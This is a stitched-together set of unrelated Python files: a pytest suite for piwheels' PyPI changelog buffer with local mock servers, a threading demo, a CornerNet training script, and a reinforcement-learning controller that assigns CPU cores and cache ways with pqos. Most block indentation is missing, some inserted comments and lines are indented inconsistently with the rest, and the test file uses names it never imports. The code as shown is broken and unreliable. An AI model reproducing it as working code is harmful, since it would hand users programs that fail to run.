from http.server import HTTPServer, BaseHTTPRequestHandler
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from xmlrpc.client import ProtocolError
from urllib.parse import urlsplit
from queue import Queue
import pytest
import http.client
import xmlrpc.client
import simplejson as json
from requests.exceptions import RequestException
from simplejson.errors import JSONDecodeError
from piwheels.master.pypi import *
UTC = timezone.utc
def dt(s):
return datetime.strptime(s, '%Y-%m-%d %H:%M:%S').replace(tzinfo=UTC)
@pytest.fixture()
def mock_requests():
# XXX Delete me?
with mock.patch('piwheels.master.pypi.requests') as requests:
yield requests
@pytest.fixture()
def mock_logger(request):
with mock.patch('piwheels.master.pypi.logger') as logger:
yield logger
@pytest.fixture()
def xml_server(request):
q = Queue()
def changelog_since_serial(n):
return [
(pkg, ver, ts, msg, index)
for index, (pkg, ver, ts, msg) in enumerate(q.get(), start=n + 1)
]
class ThreadedXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
pass
xml_server = ThreadedXMLRPCServer(("127.0.0.1", 8000))
xml_server.register_introspection_functions()
xml_server.register_function(changelog_since_serial)
xml_server_thread = Thread(target=xml_server.serve_forever)
xml_server_thread.daemon = True
xml_server_thread.start()
yield "http://127.0.0.1:8000/", q
xml_server.shutdown()
xml_server.server_close()
@pytest.fixture()
def mock_buffer(request):
with mock.patch('piwheels.master.pypi.PyPIBuffer') as buffer_proxy:
events = []
buffer_proxy().__iter__.return_value = events
yield events
@pytest.fixture()
def mock_json_server(request):
with mock.patch('piwheels.master.pypi.requests.get') as get:
packages = {}
def mock_get(url, timeout=None):
url = urlsplit(url)
if url.path.endswith('/json'):
package = url.path.rsplit('/', 2)[1]
try:
if package == 'pypi-err':
return mock.Mock(status_code=503)
else:
description = packages[package]
except KeyError:
return mock.Mock(status_code=404)
else:
if package == 'pypi-bad':
return mock.Mock(status_code=200, json=mock.Mock(
return_value={'info': {}}))
else:
return mock.Mock(status_code=200, json=mock.Mock(
return_value={'info': {'summary': description}}))
else:
return mock.Mock(status=404)
get.side_effect = mock_get
yield packages
def test_pypi_buf_talks_to_servers(xml_server):
xml_url, xml_queue = xml_server
# NOTE: Must use a serial after PYPI_EPOCH here to permit events thru,
# and we must include at least 5 minutes worth of events
buf = PyPIBuffer(pypi_xmlrpc=xml_url, serial=PYPI_EPOCH + 1000)
buf._transport.use_https = False
xml_queue.put([
('bla', '0.0', 1531320000, 'create'),
] * PYPI_MARGIN + [
('foo', '0.1', 1531327388, 'create'),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz'),
('bar', '1.0', 1531328389, 'create'),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl'),
('baz', '2.0', 1531329389, 'create'),
('baz', '2.0', 1531329390, 'add py2.py3 file baz-1.0-py2.py3-none-any.whl'),
])
# baz events aren't included in output because they've not "aged" for
# 5 minutes
assert list(buf) == [
('bla', '0.0', 1531320000, 'create', PYPI_EPOCH + 1000),
('foo', '0.1', 1531327388, 'create', PYPI_EPOCH + 1001),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz', PYPI_EPOCH + 1002),
('bar', '1.0', 1531328389, 'create', PYPI_EPOCH + 1003),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', PYPI_EPOCH + 1004),
]
def test_pypi_buf_returns_empty_before_epoch(xml_server):
# See notes in prior test
xml_url, xml_queue = xml_server
buf = PyPIBuffer(pypi_xmlrpc=xml_url, serial=0)
buf._transport.use_https = False
xml_queue.put([
('bla', '0.0', ts, 'create')
for ts in range(1531320000, 1531320000 + 1000)
])
# Nothing returned because it's all before the PYPI_EPOCH
assert list(buf) == []
def test_pypi_buf_returns_empty_before_serial(xml_server):
xml_url, xml_queue = xml_server
# Make sure we're beyond the epoch, even accounting for the amount
# PyPIBuffer jumps back by (the margin)
i = PYPI_EPOCH + PYPI_MARGIN + 1000
buf = PyPIBuffer(pypi_xmlrpc=xml_url, serial=i)
buf._transport.use_https = False
xml_queue.put([
('bla', '0.0', 1531320000, 'create'),
] * (PYPI_MARGIN - 1))
# Nothing returned yet because PyPIBuffer has jumped backwards PYPI_MARGIN
# events
assert list(buf) == []
xml_queue.put([
('foo', '0.1', 1531327388, 'create'),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz'),
('bar', '1.0', 1531328389, 'create'),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl'),
('baz', '2.0', 1531329389, 'create'),
('baz', '2.0', 1531329390, 'add py2.py3 file baz-1.0-py2.py3-none-any.whl'),
])
assert list(buf) == [
('foo', '0.1', 1531327388, 'create', i),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz', i + 1),
('bar', '1.0', 1531328389, 'create', i + 2),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', i + 3),
]
def test_pypi_buf_waits_for_more_events(xml_server):
xml_url, xml_queue = xml_server
# Make sure we're beyond the epoch, even accounting for the amount
# PyPIBuffer jumps back by (the margin)
i = PYPI_EPOCH + PYPI_MARGIN + 1000
buf = PyPIBuffer(pypi_xmlrpc=xml_url, serial=i)
buf._transport.use_https = False
xml_queue.put([
('bla', '0.0', 1531320000, 'create'),
] * (PYPI_MARGIN - 1))
# Nothing yet because of PYPI_MARGIN (see prior test)
assert list(buf) == []
xml_queue.put([
('foo', '0.1', 1531327388, 'create'),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz'),
])
# Nothing yet because even though we've pushed the event it's waiting for,
# it's not 5 minutes "old" yet
assert list(buf) == []
xml_queue.put([
('bar', '1.0', 1531328389, 'create'),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl'),
('baz', '2.0', 1531329389, 'create'),
('baz', '2.0', 1531329390, 'add py2.py3 file baz-1.0-py2.py3-none-any.whl'),
])
assert list(buf) == [
('foo', '0.1', 1531327388, 'create', i),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz', i + 1),
('bar', '1.0', 1531328389, 'create', i + 2),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', i + 3),
]
def test_pypi_buf_raises_errors():
class BadXMLHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.send_error(404, 'Function not found')
class BadXMLRPCServer(ThreadingMixIn, HTTPServer):
pass
server = BadXMLRPCServer(("127.0.0.1", 8000), BadXMLHandler)
server_thread = Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
try:
buf = PyPIBuffer(pypi_xmlrpc='http://127.0.0.1:8000/')
buf._transport.use_https = False
with pytest.raises(ProtocolError):
list(buf)
finally:
server.shutdown()
server.server_close()
def test_pypi_read_normal(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
('baz', '1.0', 1531327390, 'create', 4),
('baz', '1.0', 1531327390, 'add py2.py3 file baz-1.0-py2.py3-none-any.whl', 5),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = 'package bar'
mock_json_server['baz'] = None
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', 'package bar'),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', 'package bar'),
('baz', None, dt('2018-07-11 16:43:10'), 'create', ''),
('baz', '1.0', dt('2018-07-11 16:43:10'), 'create', ''),
]
def test_pypi_read_json_err(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('pypi-err', '1.0', 1531327389, 'create', 2),
('pypi-err', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['pypi-err'] = 'pypi broke'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('pypi-err', None, dt('2018-07-11 16:43:09'), 'create', None),
('pypi-err', '1.0', dt('2018-07-11 16:43:09'), 'create', None),
]
def test_pypi_read_json_bad(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('pypi-bad', '1.0', 1531327389, 'create', 2),
('pypi-bad', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['pypi-bad'] = 'pypi broke'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('pypi-bad', None, dt('2018-07-11 16:43:09'), 'create', None),
('pypi-bad', '1.0', dt('2018-07-11 16:43:09'), 'create', None),
]
def test_pypi_read_missing_description(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', None),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', None),
]
def test_pypi_read_huge_description(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = 'bar' * 1000
expected = ('bar' * 1000)[:199] + '…'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', expected),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', expected),
]
def test_pypi_ignore_other_events(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
('bar', '1.0', 1531327392, 'foo', 4),
('bar', '1.0', 1531327392, 'foo bar baz', 5),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = 'package bar'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', 'package bar'),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', 'package bar'),
]
def test_pypi_cache_expunge(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = 'package bar'
events = PyPIEvents(cache_size=1)
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', 'package bar'),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', 'package bar'),
]
assert ('foo', '0.1') not in events._versions
assert ('bar', '1.0') in events._versions
def test_pypi_ignore_dupes(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add source file bar-1.0.tar.gz', 3),
('bar', '1.0', 1531327389, 'add source file bar-1.0.zip', 4),
('bar', '1.0', 1531327392, 'add cp34 file bar-0.1-cp34-cp34-manylinux1_x86_64.whl', 5),
('bar', '1.0', 1531327392, 'add cp35 file bar-0.1-cp35-cp35-manylinux1_x86_64.whl', 6),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = 'package bar'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', 'package bar'),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'source', 'package bar'),
]
def test_pypi_promote_binary_to_source(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327390, 'add cp34 file bar-0.1-cp34-cp34-manylinux1_x86_64.whl', 3),
('bar', '1.0', 1531327390, 'add cp35 file bar-0.1-cp35-cp35-manylinux1_x86_64.whl', 4),
('bar', '1.0', 1531327392, 'add source file bar-1.0.tar.gz', 5),
('bar', '1.0', 1531327392, 'add source file bar-1.0.zip', 6),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = ''
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', ''),
('bar', '1.0', dt('2018-07-11 16:43:10'), 'create', ''),
# Note the timestamp doesn't alter as the release time is the
# earliest release
('bar', '1.0', dt('2018-07-11 16:43:10'), 'source', ''),
]
def test_pypi_ignore_removes(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('foo', '0.1', 1531327388, 'remove Owner foo', 2),
]
mock_json_server['foo'] = 'package foo'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
]
def test_pypi_remove_version(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('foo', '0.1', 1531327388, 'remove project', 2),
]
mock_json_server['foo'] = 'package foo'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'remove', None),
]
def test_pypi_remove_package(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('foo', None, 1531327388, 'remove release', 2),
]
mock_json_server['foo'] = 'package foo'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('foo', None, dt('2018-07-11 16:43:08'), 'remove', None),
]
def test_pypi_yank_version(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'yank release', 0),
]
events = PyPIEvents()
assert list(events) == [
('foo', '0.1', dt('2018-07-11 16:43:08'), 'yank', None),
]
def test_pypi_unyank_version(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'unyank release', 0),
]
events = PyPIEvents()
assert list(events) == [
('foo', '0.1', dt('2018-07-11 16:43:08'), 'unyank', None),
]
def test_pypi_backoff(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = ''
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', ''),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', ''),
]
mock_buffer[:] = []
assert list(events) == []
mock_buffer[:] = [
('bar', '1.1', 1531327392, 'create', 4),
('bar', '1.1', 1531327393, 'add source file bar-1.1.tar.gz', 5),
]
# Because 10 seconds haven't elapsed...
assert list(events) == []
def test_pypi_read_improper_state():
with mock.patch('xmlrpc.client.ServerProxy') as proxy:
proxy().changelog_since_serial.side_effect = (
http.client.ImproperConnectionState('Something went horribly wrong')
)
events = PyPIEvents()
assert list(events) == []
def test_pypi_read_server_error():
with mock.patch('xmlrpc.client.ServerProxy') as proxy:
proxy().changelog_since_serial.side_effect = (
xmlrpc.client.ProtocolError('Something else went wrong',
500, '', '')
)
events = PyPIEvents()
assert list(events) == []
def test_pypi_read_client_error():
with mock.patch('xmlrpc.client.ServerProxy') as proxy:
proxy().changelog_since_serial.side_effect = (
xmlrpc.client.ProtocolError('Client did something stupid',
400, '', '')
)
events = PyPIEvents()
with pytest.raises(xmlrpc.client.ProtocolError):
list(events)
|
test_script.py
|
import threading as th
import time
class Flag:
    def __init__(self, status=True, data=None):
        # Avoid the shared-mutable-default pitfall: give each Flag its own list.
        self.status = status
        self.data = data if data is not None else []
def toggle(self):
self.status = not self.status
def counter(flag):
while 1:
if len(flag.data) == 10:
            print('List is full')
flag.data = []
time.sleep(TIME)
def appender(flag):
while 1:
flag.data.append(1)
        print(f'Appending, length is now {len(flag.data)}')
time.sleep(TIME)
TIME = .5
flag = Flag()
counter_thr = th.Thread(target=counter, args=[flag])
appender_thr = th.Thread(target=appender, args=[flag])
counter_thr.start()
appender_thr.start()
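# Added sketch (hedged): the counter/appender pair above mutates flag.data from
# two threads with no lock, which only behaves because CPython's GIL keeps the
# individual list operations atomic. The variant below shows the same pattern
# with explicit locking; `data_lock`, `safe_counter` and `safe_appender` are
# new, illustrative names and are not started by this script.
data_lock = th.Lock()

def safe_counter(flag):
    while True:
        with data_lock:
            if len(flag.data) == 10:
                print('List is full')
                flag.data = []
        time.sleep(TIME)

def safe_appender(flag):
    while True:
        with data_lock:
            flag.data.append(1)
            print(f'Appending, length is now {len(flag.data)}')
        time.sleep(TIME)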
|
train.py
|
#!/usr/bin/env python
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
from tqdm import tqdm
from utils import stdout_to_tqdm
from config import system_configs
from nnet.py_factory import NetworkFactory
from torch.multiprocessing import Process, Queue, Pool
from db.datasets import datasets
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
parser = argparse.ArgumentParser(description="Train CornerNet")
parser.add_argument("cfg_file", help="config file", type=str)
parser.add_argument("--iter", dest="start_iter",
help="train at iteration i",
default=0, type=int)
parser.add_argument("--threads", dest="threads", default=4, type=int)
args = parser.parse_args()
return args
def prefetch_data(db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
traceback.print_exc()
raise e
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
data = data_queue.get()
data["xs"] = [x.pin_memory() for x in data["xs"]]
data["ys"] = [y.pin_memory() for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
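# Added commentary: pin_memory() runs in a daemon thread and moves batches from
# the multiprocessing queue into a regular queue.Queue after pinning their
# tensors (page-locked memory speeds up the later host-to-GPU copies). The
# semaphore acts as a stop flag: train() creates it, acquires it immediately,
# and releases it only at the end of training, so acquire(blocking=False)
# succeeds exactly once and the thread returns.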
def init_parallel_jobs(dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def train(training_dbs, validation_db, start_iter=0):
learning_rate = system_configs.learning_rate
max_iteration = system_configs.max_iter
pretrained_model = system_configs.pretrain
snapshot = system_configs.snapshot
val_iter = system_configs.val_iter
display = system_configs.display
decay_rate = system_configs.decay_rate
stepsize = system_configs.stepsize
# getting the size of each database
training_size = len(training_dbs[0].db_inds)
validation_size = len(validation_db.db_inds)
# queues storing data for training
training_queue = Queue(system_configs.prefetch_size)
validation_queue = Queue(5)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(system_configs.prefetch_size)
pinned_validation_queue = queue.Queue(5)
# load data sampling function
data_file = "sample.{}".format(training_dbs[0].data)
sample_data = importlib.import_module(data_file).sample_data
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(training_dbs, training_queue, sample_data, True)
    if val_iter:
        validation_tasks = init_parallel_jobs([validation_db], validation_queue, sample_data, False)
    else:
        validation_tasks = []  # keep the later cleanup loop valid when validation is disabled
training_pin_semaphore = threading.Semaphore()
validation_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
validation_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
validation_pin_args = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
validation_pin_thread.daemon = True
validation_pin_thread.start()
print("building model...")
nnet = NetworkFactory(training_dbs[0])
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("loading from pretrained model")
nnet.load_pretrained_params(pretrained_model)
if start_iter:
learning_rate /= (decay_rate ** (start_iter // stepsize))
nnet.load_params(start_iter)
nnet.set_lr(learning_rate)
print("training starts from iteration {} with learning_rate {}".format(start_iter + 1, learning_rate))
else:
nnet.set_lr(learning_rate)
print("training start...")
nnet.cuda()
nnet.train_mode()
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = nnet.train(**training)
if display and iteration % display == 0:
print("training loss at iteration {}: {}".format(iteration, training_loss.item()))
del training_loss
if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
nnet.eval_mode()
validation = pinned_validation_queue.get(block=True)
validation_loss = nnet.validate(**validation)
print("validation loss at iteration {}: {}".format(iteration, validation_loss.item()))
nnet.train_mode()
if iteration % snapshot == 0:
nnet.save_params(iteration)
if iteration % stepsize == 0:
learning_rate /= decay_rate
nnet.set_lr(learning_rate)
# sending signal to kill the thread
training_pin_semaphore.release()
validation_pin_semaphore.release()
# terminating data fetching processes
for training_task in training_tasks:
training_task.terminate()
for validation_task in validation_tasks:
validation_task.terminate()
if __name__ == "__main__":
args = parse_args()
cfg_file = os.path.join(system_configs.config_dir, args.cfg_file + ".json")
with open(cfg_file, "r") as f:
configs = json.load(f)
configs["system"]["snapshot_name"] = args.cfg_file
system_configs.update_config(configs["system"])
train_split = system_configs.train_split
val_split = system_configs.val_split
print("loading all datasets...")
dataset = system_configs.dataset
# threads = max(torch.cuda.device_count() * 2, 4)
threads = args.threads
print("using {} threads".format(threads))
training_dbs = [datasets[dataset](configs["db"], train_split) for _ in range(threads)]
validation_db = datasets[dataset](configs["db"], val_split)
print("system config...")
pprint.pprint(system_configs.full)
print("db config...")
pprint.pprint(training_dbs[0].configs)
print("len of db: {}".format(len(training_dbs[0].db_inds)))
train(training_dbs, validation_db, args.start_iter)
|
controller_img_dnn.py
|
#!/usr/bin/env python3
from datetime import datetime
from pathlib import Path
import subprocess
import gym
import os
from silence_tensorflow import silence_tensorflow
silence_tensorflow()
from stable_baselines import DQN
from stable_baselines import PPO2
import threading
import time
import configparser
import loggers
import tensorflow as tf
import numpy as np
import perfmon
import struct
import random
import psutil
from collections import deque
from itertools import zip_longest
import logging
import os
# logging.disable(logging.WARNING)
# os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
config = configparser.ConfigParser()
config.read('config.ini')
containerReward = {
'reward': [],
'lock': threading.Lock()
}
window_size = 5
deques = {
'UNHALTED_CORE_CYCLES': deque([], maxlen=window_size),
'INSTRUCTION_RETIRED': deque([], maxlen=window_size),
'PERF_COUNT_HW_CPU_CYCLES': deque([], maxlen=window_size),
'UNHALTED_REFERENCE_CYCLES': deque([], maxlen=window_size),
'UOPS_RETIRED': deque([], maxlen=window_size),
'BRANCH_INSTRUCTIONS_RETIRED': deque([], maxlen=window_size),
'MISPREDICTED_BRANCH_RETIRED': deque([], maxlen=window_size),
'PERF_COUNT_HW_BRANCH_MISSES': deque([], maxlen=window_size),
'LLC_MISSES': deque([], maxlen=window_size),
'PERF_COUNT_HW_CACHE_L1D': deque([], maxlen=window_size),
'PERF_COUNT_HW_CACHE_L1I': deque([], maxlen=window_size),
}
rewardLogger, wayLogger, sjrnLogger, stateLogger, coreLogger, rpsLogger, coreMapLogger = loggers.setupDataLoggers()
EVENTS = ['UNHALTED_CORE_CYCLES', 'INSTRUCTION_RETIRED', 'PERF_COUNT_HW_CPU_CYCLES', 'UNHALTED_REFERENCE_CYCLES', \
'UOPS_RETIRED', 'BRANCH_INSTRUCTIONS_RETIRED', 'MISPREDICTED_BRANCH_RETIRED', \
'PERF_COUNT_HW_BRANCH_MISSES', 'LLC_MISSES', 'PERF_COUNT_HW_CACHE_L1D', \
'PERF_COUNT_HW_CACHE_L1I']
# EVENT_MAX = [1009566688, 2200098315, 1413332030, 4404609, 390883292,
# 18043023, 1413719982, 18032364, 20587451, 41154, 7496985285]
EVENT_MAX = [1251666326, 2697635738, 1502160478, 1385062673, 3899393008, 265396012, 42954597, 42960949, 1598918, 14667253, 30645]
EVENT_MAX = [e*2 for e in EVENT_MAX]
class CustomEnv(gym.Env):
def __init__(self):
super(CustomEnv, self).__init__()
global deques, window_size
self.deques = deques
self.window_size = window_size
self.startingTime = round(time.time())
threading.Thread(target=loggers.containerLogger, args=(containerReward, rpsLogger, self.startingTime,), daemon=True).start()
time.sleep(3)
self.pid = 0
for proc in psutil.process_iter():
if 'img-dnn_integra' in proc.name():
self.pid = proc.pid
print(self.pid)
if self.pid == 0 :
print("Couldn't find app pid, exiting...")
exit(-1)
self.tid = list()
for tid in psutil.Process(self.pid).threads():
self.tid.append(tid.id)
self.action_space = gym.spaces.Discrete(5)
self.observation_space = gym.spaces.Box(low=0, high=1.5, shape=(13,), dtype=np.float64)
os.system('pqos -R > /dev/null')
os.system('pqos -e "llc:0=0x30000;" > /dev/null')
self.appCacheWays = 20
self.updateWays()
self.cores = [core for core in range(12, 24)]
self.cores += [core for core in range(36, 48)]
self.allCores = [core for core in range(12, 24)]
self.allCores += [core for core in range(36, 48)]
self.initialMapping()
cores = str(self.cores)[1:-1].replace(' ', '')
os.system('pqos -a "llc:1=%s;"' % cores)
self.startPerfmon()
self.previousTime = 0
def initialMapping(self):
for pid, core in zip(self.tid, self.allCores):
p = psutil.Process(pid=pid)
p.cpu_affinity([core])
def mapCores(self,action):
# action is +-1
if action == 1:
unusedCores = [core for core in self.allCores if core not in self.cores]
newCore = unusedCores[0]
self.cores.append(newCore)
cores = str(self.cores)[1:-1].replace(' ', '')
os.system('pqos -a "llc:1=%s;"' % cores)
elif action == -1:
core = self.cores.pop()
cores = str(self.cores)[1:-1].replace(' ', '')
os.system('pqos -a "llc:0=%s;" > /dev/null' % cores)
coreMapLogger.warn(str(self.cores))
thread_index = 0
for core in self.cores:
pid = self.tid[thread_index]
thread_index += 1
p = psutil.Process(pid=pid)
p.cpu_affinity([core])
cores_reversed = self.cores[::-1]
for i in range(thread_index,len(self.tid)):
core = self.cores[ ( i - thread_index ) % len(cores_reversed) ]
pid = self.tid[i]
p = psutil.Process(pid=pid)
p.cpu_affinity([core])
def startPerfmon(self):
self.sessions = [None] * len(self.tid)
for i,id in enumerate(self.tid):
self.sessions[i] = perfmon.PerThreadSession(int(id), EVENTS)
self.sessions[i].start()
def getPMC(self):
pmc = [0] * len(EVENTS)
for i in range(0,len(EVENTS)):
for session in self.sessions:
count = struct.unpack("L", session.read(i))[0]
pmc[i] += float(count)
pmc[i] /= len(self.tid)
return pmc
def formatForCAT(self, ways):
res = 1 << ways - 1
res = res + res - 1
return hex(res)
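    # Added worked example: formatForCAT builds a contiguous bitmask of `ways`
    # low-order ones for the CAT capacity mask. E.g. ways=3: 1 << 2 = 0b100,
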